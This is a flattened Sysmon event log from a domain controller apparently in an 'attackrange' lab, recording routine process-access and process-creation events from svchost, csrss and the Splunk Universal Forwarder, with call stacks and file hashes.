13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.921{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.933{59A5CD1D-8EE6-6005-D200-00000000A301}4756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.890{59A5CD1D-8EE6-6005-D100-00000000A301}48724884C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8EE6-6005-D000-00000000A301}47644740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.659{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 